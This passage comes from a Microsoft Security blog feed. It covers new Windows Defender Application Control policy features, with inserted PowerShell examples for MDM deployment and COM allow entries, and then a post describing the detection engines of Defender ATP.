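# Each policy compiles to its own binary, named after its GUID.
foreach ($xml in '.\Base.xml', '.\Supp.xml') {
    $id = ([xml](Get-Content -LiteralPath $xml -Raw)).SiPolicy.PolicyID   # e.g. {GUID}
    ConvertFrom-CIPolicy -XmlFilePath $xml -BinaryFilePath ".\$id.cip"
}
# Local deployment: copy the .cip files to C:\Windows\System32\CodeIntegrity\CiPolicies\Active
```

The model makes the asymmetry in the bullets visible: adding a second base policy can only shrink the allowed set, while adding a supplemental policy can only grow it, and a deny rule placed in a supplemental policy has no effect at all, so restrictions always belong in a base policy.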

Application Control CSP

Customers have been able to deploy Windows Defender Application Control policies via MDM using the CodeIntegrity node of the AppLocker configuration service provider (CSP). The AppLocker CSP has a number of limitations, most notably the lack of awareness of rebootless policy deployment support.

The Windows 10 May 2019 Update now has a new Application Control CSP, which introduces much richer support for policy deployment over MDM and also provides support for:

  • Rebootless policy deployment (For policies that have the “Enabled:Update Policy No Reboot” option set, the new Application Control CSP will not schedule a reboot on client systems getting the policy)
  • Support for the new multiple policies
  • For device management software vendors, better error reporting
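An added PowerShell example (my code, not the post's and not from the CSP documentation) that packages a compiled policy for the Application Control CSP and checks whether the policy carries the rebootless option the bullet refers to. Assumptions: the node path `./Vendor/MSFT/ApplicationControl/Policies/<PolicyID without braces>/Policy` and its `b64` data format are as I recall them from the CSP reference; the CSP accepts only policies in the multiple-policy format (ones that carry a `<PolicyID>`); the SyncML fragment is the generic OMA DM `<Add>` shape, and what a given MDM server actually emits is that server's business; `Base.xml` and `MergedPolicy.cip` are placeholders.

```powershell
# Added example, not from the original post. Package a .cip for the Application Control CSP.
function New-AppControlCspPayload {
    param(
        [Parameter(Mandatory)][string]$PolicyXmlPath,     # XML the binary was built from
        [Parameter(Mandatory)][string]$PolicyBinaryPath   # output of ConvertFrom-CIPolicy
    )
    [xml]$doc = Get-Content -LiteralPath $PolicyXmlPath -Raw
    $policyId = $doc.SiPolicy.PolicyID
    if (-not $policyId) {
        throw 'No <PolicyID>: convert to the multiple-policy format first (Set-CIPolicyIdInfo -ResetPolicyID).'
    }
    $policyId = $policyId.Trim('{', '}')   # assumed: the CSP node name uses the bare GUID

    # The CSP skips the reboot only when the policy itself carries option 16.
    $options   = @($doc.SiPolicy.Rules.Rule | ForEach-Object { $_.Option })
    $rebootless = $options -contains 'Enabled:Update Policy No Reboot'

    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path -LiteralPath $PolicyBinaryPath).Path)
    [pscustomobject]@{
        PolicyId       = $policyId
        OmaUri         = "./Vendor/MSFT/ApplicationControl/Policies/$policyId/Policy"
        Format         = 'b64'
        Base64Policy   = [Convert]::ToBase64String($bytes)
        RebootExpected = -not $rebootless
    }
}

function ConvertTo-SyncMlAdd {
    # Generic OMA DM <Add> item carrying the payload (assumed shape, see lead-in).
    param([Parameter(Mandatory)]$Payload, [int]$CmdId = 1)
@"
<Add>
  <CmdID>$CmdId</CmdID>
  <Item>
    <Target><LocURI>$($Payload.OmaUri)</LocURI></Target>
    <Meta><Format xmlns="syncml:metinf">$($Payload.Format)</Format></Meta>
    <Data>$($Payload.Base64Policy)</Data>
  </Item>
</Add>
"@
}

# Usage (placeholder file names)
$payload = New-AppControlCspPayload -PolicyXmlPath .\Base.xml -PolicyBinaryPath .\MergedPolicy.cip
if ($payload.RebootExpected) {
    Write-Warning 'Policy lacks Enabled:Update Policy No Reboot (option 16); clients will be asked to reboot.'
}
ConvertTo-SyncMlAdd -Payload $payload | Set-Content -LiteralPath .\AppControlPolicy.syncml
```

For a custom OMA-URI profile in an MDM console the three fields you need are `OmaUri`, `Format` (Base64) and `Base64Policy`; the SyncML is only for MDM vendors or for inspecting what goes over the wire.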

COM object registration support

Windows Defender Application Control enforces a built-in allow list of COM object registrations to reduce the risk introduced from certain powerful COM objects. Customers have reported that while this capability is desirable from a security perspective, there are specific cases in their environments where they’d like to allow the registration of additional COM objects required for their business.

With the Windows 10 May 2019 Update customers can now specify COM objects that need to be allowed in environments they’re managing with Windows Defender Application Control policies.
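An added PowerShell example (my code, not the post's or Microsoft's) that adds a COM object allow entry to an existing WDAC policy XML in place. Assumptions: the entry format is a `<Setting>` element under `<Settings>` with `Provider`, `Key` (the CLSID in braces) and `ValueName="EnterpriseDefinedClsId"` and a `<Value><Boolean>true</Boolean></Value>` body, with `Provider` being one of `PowerShell`, `WSH`, `IE`, `VBA`, `MSI` or `AllHostIds`, as I know it from the WDAC documentation for this feature; element order in the policy schema is what I recall from generated policies, and `ConvertFrom-CIPolicy` will refuse the file if that recollection is wrong; the all-zero CLSID in the usage line is a placeholder, not a real object.

```powershell
# Added example, not from the original post. Allow one COM object registration in a policy.
function Add-WdacComAllow {
    param(
        [Parameter(Mandatory)][string]$PolicyXmlPath,
        # CLSID in registry form, braces included
        [Parameter(Mandatory)][ValidatePattern('^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$')]
        [string]$Clsid,
        # Prefer the narrowest host that needs the object; AllHostIds is the broadest grant.
        [ValidateSet('PowerShell', 'WSH', 'IE', 'VBA', 'MSI', 'AllHostIds')]
        [string]$Provider = 'PowerShell'
    )
    [xml]$doc = Get-Content -LiteralPath $PolicyXmlPath -Raw
    $ns  = $doc.SiPolicy.NamespaceURI              # urn:schemas-microsoft-com:sipolicy
    $nsm = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $nsm.AddNamespace('p', $ns)

    $settings = $doc.SelectSingleNode('/p:SiPolicy/p:Settings', $nsm)
    if (-not $settings) {
        # Generated policies normally already have <Settings> (PolicyInfo). If not, insert it
        # before BasePolicyID/PolicyID so the schema's element order is kept (assumed order).
        $settings = $doc.CreateElement('Settings', $ns)
        $anchor = $doc.SelectSingleNode('/p:SiPolicy/p:BasePolicyID | /p:SiPolicy/p:PolicyID', $nsm)
        if ($anchor) { [void]$doc.SiPolicy.InsertBefore($settings, $anchor) }
        else         { [void]$doc.SiPolicy.AppendChild($settings) }
    }

    # Idempotent: do not add a second entry for the same host/CLSID pair.
    $dup = $settings.SelectSingleNode(
        "p:Setting[@Provider='$Provider' and @Key='$Clsid' and @ValueName='EnterpriseDefinedClsId']", $nsm)
    if ($dup) { return $false }

    $setting = $doc.CreateElement('Setting', $ns)
    $setting.SetAttribute('Provider',  $Provider)
    $setting.SetAttribute('Key',       $Clsid)
    $setting.SetAttribute('ValueName', 'EnterpriseDefinedClsId')
    $value = $doc.CreateElement('Value', $ns)
    $bool  = $doc.CreateElement('Boolean', $ns)
    $bool.InnerText = 'true'
    [void]$value.AppendChild($bool)
    [void]$setting.AppendChild($value)
    [void]$settings.AppendChild($setting)

    $doc.Save((Resolve-Path -LiteralPath $PolicyXmlPath).Path)
    return $true
}

# Usage: placeholder CLSID; scope the grant to the host that really needs the object.
Add-WdacComAllow -PolicyXmlPath .\MergedPolicy.xml -Clsid '{00000000-0000-0000-0000-000000000000}' -Provider PowerShell
# Recompile; the schema validation here is the safety net for any hand-edited XML.
ConvertFrom-CIPolicy -XmlFilePath .\MergedPolicy.xml -BinaryFilePath .\SIPolicy.p7b
```

Treat each added CLSID as you would a signer rule: record who asked for it and why, because allowing a powerful COM object re-opens exactly the risk the built-in allow list exists to close.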

Disabled: Script Enforcement rule option support

The Windows 10 May 2019 Update with KB4497935 introduces proper support for the Disabled: Script Enforcement rule option.

Customers recognize the importance of having restrictions on script hosts but are often looking to break up their application control projects into smaller chunks to help with deployment feasibility. The “Disabled:Script Enforcement” rule option in the policy now turns off policy enforcement for MSIs, PowerShell scripts, and WSH-hosted scripts. This allows IT departments to tackle EXE, DLL, and driver enforcement first without having to address script host control at the same time; it should be treated as a phasing aid, not an end state, since scripts left unenforced remain an execution path around the policy.

Disabled: Script Enforcement rule

Try the new capabilities today

We invite everyone to try these new Windows Defender Application Control capabilities, alongside existing features like managed installer. For customers using Microsoft Defender ATP, consider using Advanced hunting to query the WDAC events centrally to understand and monitor the behavior of all these new policy controls on client machines in your environment. Learn about both new and existing functionalities with the Windows Defender Application Control deployment guide.

We’re also working on supplementing the documentation we have out now. Stay tuned for updates from our team for tools and guidance on GitHub that provide more practical examples and ready-to-use scripts.


Nazmus Sakib
Senior Program Manager, Windows Defender Application Control team

The post Delivering major enhancements in Windows Defender Application Control with the Windows 10 May 2019 Update appeared first on Microsoft Security.

Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection

While Windows Defender Antivirus makes catching 5 billion threats on devices every month look easy, multiple advanced detection and prevention technologies work under the hood to make this happen.

Windows Defender Antivirus is the next-generation protection component of Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP), Microsoft’s unified endpoint security platform. Much like how Microsoft Defender ATP integrates multiple capabilities to address the complex security challenges in modern enterprises, Windows Defender Antivirus uses multiple engines to detect and stop a wide range of threats and attacker techniques at multiple points.

These next-generation protection engines provide industry-best detection and blocking capabilities. Many of these engines are built into the client and provide advanced protection against the majority of threats in real time. When the client encounters unknown threats, it sends metadata or the file itself to the cloud protection service, where more advanced protections examine new threats on the fly and integrate signals from multiple sources.

These next-generation protection engines ensure that protection is:

  • Accurate: Threats both common and sophisticated, a lot of which are designed to try and slip through protections, are detected and blocked
  • Real-time: Threats are prevented from getting on to devices, stopped in real-time at first sight, or detected and remediated in the least possible time (typically within a few milliseconds)
  • Intelligent: Through the power of the cloud, machine learning (ML), and Microsoft’s industry-leading optics, protection is enriched and made even more effective against new and unknown threats

My team continuously enhances each of these engines to be increasingly effective at catching the latest strains of malware and attack methods. These enhancements show up in consistent top scores in industry tests, but more importantly, translate to threats and malware outbreaks stopped and more customers protected.

Here’s a rundown of the many components of the next generation protection capabilities in Microsoft Defender ATP:

In the cloud:

  • Metadata-based ML engine – Specialized ML models, which include file type-specific models, feature-specific models, and adversary-hardened monotonic models, analyze a featurized description of suspicious files sent by the client. Stacked ensemble classifiers combine results from these models to make a real-time verdict to allow or block files pre-execution.
  • Behavior-based ML engine – Suspicious behavior sequences and advanced attack techniques are monitored on the client as triggers to analyze the process tree behavior using real-time cloud ML models. Monitored attack techniques span the attack chain, from exploits, elevation, and persistence all the way through to lateral movement and exfiltration.
  • AMSI-paired ML engine – Pairs of client-side and cloud-side models perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks. These models include a pair of models for each of the scripting engines covered, including PowerShell, JavaScript, VBScript, and Office VBA macros. Integrations include both dynamic content calls and/or behavior instrumentation on the scripting engines.
  • File classification ML engine – Multi-class, deep neural network classifiers examine full file contents, providing an additional layer of defense against attacks that require additional analysis. Suspicious files are held from running and submitted to the cloud protection service for classification. Within seconds, full-content deep learning models produce a classification and reply to the client to allow or block the file.
  • Detonation-based ML engine – Suspicious files are detonated in a sandbox. Deep learning classifiers analyze the observed behaviors to block attacks.
  • Reputation ML engine – Domain-expert reputation sources and models from across Microsoft are queried to block threats that are linked to malicious or suspicious URLs, domains, emails, and files. Sources include Windows Defender SmartScreen for URL reputation models and Office 365 ATP for email attachment expert knowledge, among other Microsoft services through the Microsoft Intelligent Security Graph.
  • Smart rules engine – Expert-written smart rules identify threats based on researcher expertise and collective knowledge of threats.

On the client:

  • ML engine – A set of light-weight machine learning models make a verdict within milliseconds. These include specialized models and features that are built for specific file types commonly abused by attackers. Examples include models built for portable executable (PE) files, PowerShell, Office macros, JavaScript, PDF files, and more.
  • Behavior monitoring engine – The behavior monitoring engine monitors for potential attacks post-execution. It observes process behaviors, including behavior sequence at runtime, to identify and block certain types of activities based on predetermined rules.
  • Memory scanning engine – This engine scans the memory space used by a running process to expose malicious behavior that may be hiding through code obfuscation.
  • AMSI integration engine – Deep in-app integration engine enables detection of fileless and in-memory attacks through Antimalware Scan Interface (AMSI), defeating code obfuscation. This integration blocks malicious behavior of scripts client-side.
  • Heuristics engine – Heuristic rules identify file characteristics that have similarities with known malicious characteristics to catch new threats or modified versions of known threats.
  • Emulation engine – The emulation engine dynamically unpacks malware and examines how it would behave at runtime. Emulating the content and scanning both the behavior during emulation and the memory contents at the end of emulation defeat malware packers and expose the behavior of polymorphic malware.
  • Network engine – Network activities are inspected to identify and stop malicious activities from threats.

Together with attack surface reduction—composed of advanced capabilities like hardware-based isolation, application control, exploit protection, network protection, controlled folder access, attack surface reduction rules, and network firewall—these next-generation protection engines deliver Microsoft Defender ATP’s pre-breach capabilities, stopping attacks before they can infiltrate devices and compromise networks.

As part of Microsoft’s defense-in-depth solution, the superior performance of these engines accrues to the Microsoft Defender ATP unified endpoint protection, where antivirus detections and other next-generation protection capabilities enrich endpoint detection and response, automated investigation and remediation, advanced hunting, threat and vulnerability management, managed threat hunting service, and other capabilities.

These protections are further amplified through Microsoft Threat Protection, Microsoft’s comprehensive, end-to-end security solution for the modern workplace. Through signal-sharing and orchestration of remediation across Microsoft’s security technologies, Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

The enormous evolution of Microsoft Defender ATP’s next generation protection follows the same upward trajectory of innovation across Microsoft’s security technologies, which the industry recognizes, and customers benefit from. We will continue to improve and lead the industry in evolving security.


Tanmay Ganacharya (@tanmayg)
Principal Director, Microsoft Defender ATP Research




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection appeared first on Microsoft Security.